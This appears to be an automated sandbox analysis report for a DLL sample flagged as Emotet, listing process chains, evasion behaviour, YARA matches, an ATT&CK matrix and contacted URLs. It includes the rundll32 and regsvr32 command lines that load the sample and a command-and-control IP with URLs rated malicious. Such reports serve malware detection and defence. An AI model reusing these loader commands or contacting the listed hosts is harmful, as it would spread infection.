Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dll
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllUnregisterServer
Source: C:\Windows\System32\rundll32.exe  Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvhlOU\CPyd.dll"
Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown  Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dll
Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\2V7zjcga5L.dll,DllUnregisterServer
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
Source: C:\Windows\System32\rundll32.exe  Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TvhlOU\CPyd.dll"
Source: C:\Windows\System32\regsvr32.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
Source: classification engine  Classification label: mal76.troj.evad.winDLL@19/5@0/3
Source: C:\Windows\System32\regsvr32.exe  File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe  Code function: 7_2_00000001800046A8 CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,  7_2_00000001800046A8
Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
Source: C:\Windows\System32\svchost.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe  File read: C:\Windows\System32\drivers\etc\hosts
Source: 2V7zjcga5L.dll  Static PE information: Image base 0x180000000 > 0x60000000
Source: 2V7zjcga5L.dll  Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000007.00000002.828634313.0000000000C95000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000007.00000002.828634313.0000000000C95000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_000000018001AFFD push ebp; retf  3_2_000000018001AFFE
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_00000001800051D1 push ebp; iretd  3_2_00000001800051D2
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_000000018001BA32 push ebp; retf  3_2_000000018001BA33
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_0000000180004E83 push es; ret  3_2_0000000180004E84
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_000000018001B694 push es; ret  3_2_000000018001B6E9
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_000000018001BADD push ebp; iretd  3_2_000000018001BADE
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_000000018001B717 push ebp; iretd  3_2_000000018001B718
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_0000000180007B3F push esp; retf  3_2_0000000180007B40
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_000000018001AF4E push ebp; retf  3_2_000000018001AF4F
Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001AFFD push ebp; retf  4_2_000000018001AFFE
Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_00000001800051D1 push ebp; iretd  4_2_00000001800051D2
Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001BA32 push ebp; retf  4_2_000000018001BA33
Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_0000000180004E83 push es; ret  4_2_0000000180004E84
Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001B694 push es; ret  4_2_000000018001B6E9
Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001BADD push ebp; iretd  4_2_000000018001BADE
Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001B717 push ebp; iretd  4_2_000000018001B718
Source: C:\Windows\System32\rundll32.exe  Code function: 4_2_000000018001AF4E push ebp; retf  4_2_000000018001AF4F
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_000000018001AFFD push ebp; retf  5_2_000000018001AFFE
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_00000001800051D1 push ebp; iretd  5_2_00000001800051D2
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_000000018001BA32 push ebp; retf  5_2_000000018001BA33
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_0000000180004E83 push es; ret  5_2_0000000180004E84
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_000000018001B694 push es; ret  5_2_000000018001B6E9
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_000000018001BADD push ebp; iretd  5_2_000000018001BADE
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_000000018001B717 push ebp; iretd  5_2_000000018001B718
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_0000000180007B3F push esp; retf  5_2_0000000180007B40
Source: C:\Windows\System32\rundll32.exe  Code function: 5_2_000000018001AF4E push ebp; retf  5_2_000000018001AF4F
Source: C:\Windows\System32\regsvr32.exe  Code function: 7_2_00000001800051D1 push ebp; iretd  7_2_00000001800051D2
Source: C:\Windows\System32\regsvr32.exe  Code function: 7_2_0000000180004E83 push es; ret  7_2_0000000180004E84
Source: C:\Windows\System32\regsvr32.exe  Code function: 7_2_0000000180007B3F push esp; retf  7_2_0000000180007B40
Source: C:\Windows\System32\regsvr32.exe  Code function: 3_2_00007FFA526A7BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,  3_2_00007FFA526A7BE8
Source: 2V7zjcga5L.dll  Static PE information: real checksum: 0x85ab6 should be: 0x9110a
Source: C:\Windows\System32\loaddll64.exe  Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2V7zjcga5L.dll
Source: C:\Windows\System32\rundll32.exe  PE file moved: C:\Windows\System32\TvhlOU\CPyd.dll

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\JoOzHOkj\lOBjGnbzgLJQ.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\system32\TvhlOU\CPyd.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\rundll32.exe File opened: C:\Windows\system32\EyNaV\uwKfjswbvPYcDYp.dll:Zone.Identifier read attributes | delete
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe TID: 5832 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 3000 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6224 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_3-10006
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,7_2_000000018000D26C
Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_3-10007
Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: svchost.exe, 00000008.00000002.780129790.000001A1BF22A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`b
Source: svchost.exe, 00000014.00000002.828878679.00000280A8088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(@
Source: svchost.exe, 00000008.00000002.780383902.000001A1C4A63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @Hyper-V RAW
Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828796250.0000000000E8F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501793764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.780368082.000001A1C4A4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.829009677.00000280A80ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000A.00000002.828725718.000002830B402000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000014.00000002.828872295.00000280A8082000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp`
Source: regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP~
Source: svchost.exe, 0000000A.00000002.828769088.000002830B428000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA526A20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFA526A20E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA526A7BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,3_2_00007FFA526A7BE8
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\loaddll64.exe Process queried: DebugPort
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA526AD318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFA526AD318
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA526A20E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFA526A20E0
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA526A6550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFA526A6550

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\regsvr32.exe Network Connect: 23.239.0.12 443
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\2V7zjcga5L.dll",#1
Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,3_2_00007FFA526ADF20
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA,3_2_00007FFA526AC6E4
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA,3_2_00007FFA526AC39C
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,3_2_00007FFA526ADF98
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoW,3_2_00007FFA526ADF3C
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA,3_2_00007FFA526AC834
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA,3_2_00007FFA526AC7F4
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,3_2_00007FFA526AC450
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,3_2_00007FFA526AC934
Source: C:\Windows\System32\regsvr32.exe Code function: EnumSystemLocalesA,3_2_00007FFA526AC8C8
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP,3_2_00007FFA526AC16C
Source: C:\Windows\System32\regsvr32.exe Code function: GetLocaleInfoA,3_2_00007FFA526AE1E8
Source: C:\Windows\System32\regsvr32.exe Code function: _getptd,GetLocaleInfoA,3_2_00007FFA526AC2B4
Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA526A4558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_00007FFA526A4558
Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00007FFA526AE6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,3_2_00007FFA526AE6C0

Stealing of Sensitive Information

Source: Yara match File source: 4.2.rundll32.exe.230423c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.28dc9d20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.28dc9d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.f30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.regsvr32.exe.1050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.regsvr32.exe.f30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.230423c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.828897000.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.443771907.0000000001050000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.443873760.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.447104613.00000230423C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.829091404.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.444094574.0000028DC9D20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.446272102.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 2 Native API | 1 DLL Side-Loading | 111 Process Injection | 2 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 3 Virtualization/Sandbox Evasion | LSASS Memory | 31 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 2 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 111 Process Injection | Security Account Manager | 3 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Hidden Files and Directories | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Regsvr32 | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Rundll32 | DCSync | 34 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 1 File Deletion | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Behavior Graph (graph image not present; nodes and edges recovered from the graph text)

Behavior Graph ID: 626492 Sample: 2V7zjcga5L.dll Startdate: 14/05/2022 Architecture: WINDOWS Score: 76
Top-level signatures: Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; Yara detected Emotet
Processes started from the sample: loaddll64.exe, svchost.exe, svchost.exe, 4 other processes
loaddll64.exe started: cmd.exe, rundll32.exe, regsvr32.exe, rundll32.exe
svchost.exe contacted 127.0.0.1 (unknown unknown); svchost.exe contacted 192.168.2.1 (unknown unknown)
cmd.exe started rundll32.exe; rundll32.exe: Hides that the sample has been downloaded from the Internet (zone.identifier)
rundll32.exe started regsvr32.exe; rundll32.exe: Hides that the sample has been downloaded from the Internet (zone.identifier)
regsvr32.exe contacted 23.239.0.12, 443, 49754 LINODE-APLinodeLLCUS United States; regsvr32.exe: System process connects to network (likely due to code injection or exploit)

Source | Detection | Scanner | Label
2V7zjcga5L.dll | 33% | Virustotal |
No Antivirus matches
Source | Detection | Scanner | Label
5.2.rundll32.exe.28dc9d20000.0.unpack | 100% | Avira | HEUR/AGEN.1215493
4.2.rundll32.exe.230423c0000.0.unpack | 100% | Avira | HEUR/AGEN.1215493
7.2.regsvr32.exe.f30000.1.unpack | 100% | Avira | HEUR/AGEN.1215493
3.2.regsvr32.exe.1050000.0.unpack | 100% | Avira | HEUR/AGEN.1215493
No Antivirus matches
Source | Detection | Scanner | Label
https://23.239.0.12/S9 | 100% | Avira URL Cloud | malware
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
https://www.pango.co/privacy | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://23.239.0.12/ | 0% | URL Reputation | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
https://23.239.0.12/w9 | 100% | Avira URL Cloud | malware
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
https://23.239.0.12/ | true | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://23.239.0.12/S9 | regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://23.239.0.12/s9 | regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.hotspotshield.com/terms/ | svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.pango.co/privacy | svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://disneyplus.com/legal. | svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 00000008.00000002.780383902.000001A1C4A63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.829009677.00000280A80ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://www.tiktok.com/legal/report/feedback | svchost.exe, 00000014.00000003.822548470.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.822494594.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.822517778.00000280A8B79000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://help.disneyplus.com. | svchost.exe, 00000014.00000003.818773677.00000280A8B7A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.818709765.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://23.239.0.12/w9 | regsvr32.exe, 00000007.00000003.501740704.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.501820998.0000000000E61000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.828762679.0000000000E61000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://support.hotspotshield.com/ | svchost.exe, 00000014.00000003.815381462.00000280A9019000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815281390.00000280A8BAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815239422.00000280A8B9B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815120027.00000280A9002000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815330686.00000280A8B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.815148701.00000280A9003000.00000004.00000020.00020000.00000000.sdmp | false | | high
